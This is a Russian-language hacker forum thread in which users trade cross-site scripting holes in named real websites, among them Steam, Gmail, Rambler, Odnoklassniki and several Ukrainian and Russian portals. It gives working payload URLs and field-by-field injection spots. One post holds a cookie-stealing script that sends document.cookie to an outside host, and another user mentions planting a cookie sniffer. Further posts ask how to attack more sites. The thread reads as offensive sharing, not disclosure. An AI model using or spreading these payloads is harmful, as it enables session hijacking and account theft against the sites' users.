Вот нашол свою первую XSS

Онлайн игра azona.ru

Идем на сайт azona.ru регаемся дальше вводим любые данные кроме маила
потом в маиле вбиваете "><script>alert('XSS')</script>" (без ковычек)
и вот XSS

ЗЫ вроде туда запостил если нет переместите в нужный раздел

Это пассивка вроде
А поля там все уязвимы..

Екатеринбурский крупнейший портал города:
www.e1.ru - там есть такая штука как фотоальбом, так в фотоальбоме к фотографиям есть поле "Название" к фотографиямесле там уязвимое поле под XSS

пассивные
http://noxak.ru/snak3_find.html , но на SMSline.Biz .
там стоит уже алерт. указываем телефон и гоу, да хоть алерт в форму телефона.


Довольно-таки крупный поисковик.
http://wwjd.ru/search.php?q=%22%3E%3Cscript%3Ealert%28%29%3B%3C%2 Fscript%3E
14 алертов

Активная xss в почтовике http://www.email.ro
Шлем в теле письма: <img src=1.gif onerror=xss>

wow.citynov.ru

В личных сообщениях не фильтруется поле "Тема".

Estemail.com.ua - полуплатная говнопочта.

Тупо не фильтруется поле "Тема" в письме.

Универсальный оператор связи.
http://eltel.net/news/announcements/?id=%3Cscript%3Ealert('xss')%3C/script%3E

https://cafe.steampowered.com/index.php?area=cafe/directory&country="><script>alert('XSS')</script>

дерзайте сайт всемирный фирмы каторая держить кс!
XSS нашол не я! ибо нашол на забугорных сайтах xss
Так же была найдена SQL иньекция (без поддомена cafe) к сожелению ее прикрыли но хакер выхватил то что надо.......

Спасибо за внимание!

(извените если не туда)

http://webmail.meta.ua/img/logo_t.gif Meta.ua

Активная XSS при открытии вложения, а именно злобного SWF-файла.
Работает в Mozilla Firefox.
Файл создавать так:
http://forum.antichat.ru/showthread.php?t=65360
Проверил в Opera 9.52- тоже работает.

goroskop.bigmir.net

Уязвимо поле "Имя" при составлении любого гороскопа, однако статическая страница с XSS-кодом выводится только в "Персональном гороскопе".
Пример:

Gmail.com
Та же самая ситуация с ядовитой флешкой.
Работает в Opera 9.52 и в FF 3 (на второй ветке не проверял).

Rambler.ru
И опять 25. Баги с гороскопами повторяются, на сей раз под скальпелем- Рамблер(движок гороскопов тот же, что и на Бигмире).

"Персональный":
"Китайский 2008":

Ukr.net

Украинская электронная почта №1

При заливке видео не фильтруется параметр "Ник":
Удалили уже...

))

Google.com

Вообщем есть такая замечательная штука как
Гаджеты гугла. Создаем в igoogle гаджет
и прописываем наш код cохраняем
(ссылочку на файл xml копируем )
создаем свой сайт там есть возможность вставить гаджет в страничку
в итоге

http://sites.google.com/site/xcedz0mbie/

прокатывает и в опере последней и в фф

одноклассники.ру

Уязвимость присутствует из-за отсутствия фильтрации в имени создаваемой группы. Достаточно лишь закрыть тег <title>. Однако есть ограничение на количество символов... :(

В продолжение темы о социальных сетях...
connect.ua

"Мои фото" -> создаем альбом.
Не фильтруются поля "Описание"(работает в списке альбомов) и "Название"(работает при входе в альбом, но тут надо приписать закрытый тег </title>).

"Аудио"- не фильтруются поля "Альбом" и "Исполнитель". Работает в "Моих записях" и на главной странице(!) профиля.

Кто хочет поискать еще- дерзайте! Кто ищет, тот... выпьет обязательно! ;)

TUT.UA- молодой, но довольно крупный проект.

При регистрации называем себя именем:
+ в списке новых пользователей:

Кстати еще нашел пасивную XSS на TUT.UA http://photo.tut.ua/search/ - в строке поиска пишем "><script>alert()</script> ))) Ппц (Еси не вв тему просто хотел дополнить ХSS - iddqd ))

Хммм обьясните плиз я вот на сайте зарегался ну как бы свой снифер вставил! Мой логин kuzya так вот еси мну в поиске поискать ну набрав мой ник kuzya то ничего не находит и не какой Xss не вылазиет! А вот мну куки отсылаются!! Чот я не понял)))Обьясните!http://photo.tut.ua/search/?q=kuzya&w=0&type=all - ВОт!!Ниче нету же)

BanQui,
http://photo.tut.ua/search/?q='"/><script>img = new Image(); img.src = "http://na-s.ru/images/888888_1.gif?"+document.cookie;</script>&w=0&type=all

Antimir.com.ua - какбы социалка+знакомства ;)

При заполнении анкеты в основном блоке "О себе" не фильтруется поле "Я ищу"(нужно указать"Другое" и вставить свой кодес).

Блок "Интересы":
Ваши интересы=>и еще мне нравится=>кодес;
Чем Вы займетесь в свободное время=>а также=>кодес;
Занятия спортом=>другое=>кодес;
Стили музыки=>другое=>кодес.

LiveInternet.ru

При заполнении анкеты не фильтруются поля "Имя", "Фамилия" и "Отчество".

steampowered.com

http://store.steampowered.com/news/?appids=%22%3E%3Cscript%3Ealert(%27XXS%20by%20dizn t%27)%3C/script%3E

http://store.steampowered.com/search/?genre=RPG&category1=%22%3E%3Cscript%3Ealert(%27XX S%20by%20diznt%27)%3C/script%3E

http://store.steampowered.com/news/?term="><script>alert('XSS by diznt')<%2Fscript>

XSS найдены мною лично... (думаю +++ поставите)

Х*й тебе на воротник а не + ...
Ты различие между пассивками и активками видишь?

Точно извените,
А нету спец раздела под пассивки?

ПС что такие не адекваты то?

Мне пох*й :)

mail.oboz.ua

Не фильтруется тело(!) письма, в отличии от темы... :confused:
Как в режиме текста, так и в html.

uaportal.com

"Дерево друзей"- заполняем информацию о себе. Ничего не фильтруется :)

Просто смешно, написали свой форум с огромным кол-вом уязвимостей.
dropzone.by парашютный форум, - настоящие экстрималы)))
тут

planeta.rambler.ru

При просмотре профиля не фильтруется поле "Ник".

http://i071.radikal.ru/0810/ed/d17ea7043adax.jpg

http://dom2.ru/

В комментарий можно вставить "><script>alert()</script>

p.s. Собчак лошадь =\

http://www.4shared.com
сервис для хранения файлов
Вариант 1
Заводим аккуант, далее заходим в панель управления и закачиваем файл ,
к примеру blabla.gif затем переименовываем его как {xssCode}.gif
Таким образом, если зайти на страничку со ссылкой на наш файл на этих сервисах, то
сработает наш "ядовитый" код.
Вариант 2
Отправляем личное сообщение юзеру с нашим {xssCode}. Для этого мы заходим на
ту страничку где есть ссылка на закачку файла.
При открытии в панели управления сообщения, отправленного нами, выполнится наш код.

используется на qip.ru :)

http://wow.ru/images/head_new_r1_c2.jpg

WOW.RU

Оффициальный русский сервер варкрафта

вводим в поиск
=))

это не активка =\

тут тема для активных XSS, или ты разницу не рубишь? :(

Это xss пассивная)))
Если ты так рубишь,то должен знатть про xss post методом))

народ а можно-ли че с этим сайтом сделать http://www.asto.ru/ или
http://www.happysvadba.ru/cat_item.php?iid=1078 и что можно вообще сделать с этим?